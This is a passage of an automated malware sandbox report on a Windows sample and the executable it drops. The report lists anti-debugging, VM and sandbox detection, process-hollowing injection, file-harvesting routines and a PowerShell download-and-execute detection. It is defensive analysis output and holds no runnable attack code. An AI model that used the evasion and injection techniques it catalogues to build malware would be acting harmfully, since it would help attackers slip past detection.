                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B20F59 pushfd ; iretd 2_2_00B21078
                    Source: VAIIBIHmtT.exeStatic PE information: section name: .text entropy: 7.267782607208231
                    Source: ScreenUpdateSync[1].exe.1.drStatic PE information: section name: .text entropy: 7.493472251285573
                    Source: 81C9.tmp.exe.1.drStatic PE information: section name: .text entropy: 7.493472251285573
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeFile created: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0040E999
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking locale)
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-26293
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeWindow / User API: threadDelayed 970Jump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeWindow / User API: threadDelayed 9019Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeEvaded block: after key decisiongraph_2-27454
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-32394
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-36582
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeAPI coverage: 8.3 %
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI coverage: 6.4 %
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440Thread sleep count: 970 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440Thread sleep time: -689670s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440Thread sleep count: 9019 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe TID: 7440Thread sleep time: -6412509s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00B2DCE7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_00B2C0D7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B2E077
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B21937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B21937
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B2F917
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B34107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00B34107
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00B2E697
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_00B2EF87
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_00B347D7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B33B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_00B33B17
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B34B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B34B77
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_004027D0 GetNumberFormatW,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,EnumTimeFormatsW,GetTempFileNameW,IsBadCodePtr,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus,0_2_004027D0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00401160 GetSystemInfo,ExitProcess,2_2_00401160
                    Source: Amcache.hve.5.drBinary or memory string: VMware
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                    Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.000000000075F000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4170117651.0000000003319000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.000000000075F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWaT
                    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 81C9.tmp.exe, 00000002.00000002.2008489449.00000000007EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26120
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26281
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26278
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26300
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26292
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26166
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26321
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_004072EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004072EC
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,000000002_2_004045C0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00408BC5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00408BC5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_005F0083 push dword ptr fs:[00000030h]0_2_005F0083
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00740042 push dword ptr fs:[00000030h]0_2_00740042
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0077081F mov eax, dword ptr fs:[00000030h]0_2_0077081F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0042FE7F mov eax, dword ptr fs:[00000030h]1_2_0042FE7F
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00419750 mov eax, dword ptr fs:[00000030h]2_2_00419750
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_007FB8A3 push dword ptr fs:[00000030h]2_2_007FB8A3
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B399B7 mov eax, dword ptr fs:[00000030h]2_2_00B399B7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B20D90 mov eax, dword ptr fs:[00000030h]2_2_00B20D90
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2092B mov eax, dword ptr fs:[00000030h]2_2_00B2092B
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0043BBE1 GetProcessHeap,1_2_0043BBE1
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0040A876 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A876
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00406215 SetUnhandledExceptionFilter,0_2_00406215
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_004072EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004072EC
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_004080A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004080A5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0042A3F3
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004104F3
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00410686 SetUnhandledExceptionFilter,1_2_00410686
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040F936
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041AD48
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0041CEEA SetUnhandledExceptionFilter,2_2_0041CEEA
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041B33A
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B3B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00B3B5A1
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B3D151 SetUnhandledExceptionFilter,2_2_00B3D151
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B3AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B3AFAF
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: 81C9.tmp.exe PID: 7456, type: MEMORYSTR
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00740110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00740110
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeMemory written: C:\Users\user\Desktop\VAIIBIHmtT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00419600
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B39867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00B39867
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess created: C:\Users\user\Desktop\VAIIBIHmtT.exe "C:\Users\user\Desktop\VAIIBIHmtT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeProcess created: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe "C:\Users\user\AppData\Local\Temp\81C9.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0075113B cpuid 0_2_0075113B
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: GetLocaleInfoA,0_2_0040D34C
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_0043B02A
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: GetLocaleInfoW,1_2_004351E0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: EnumSystemLocalesW,1_2_0043B2ED
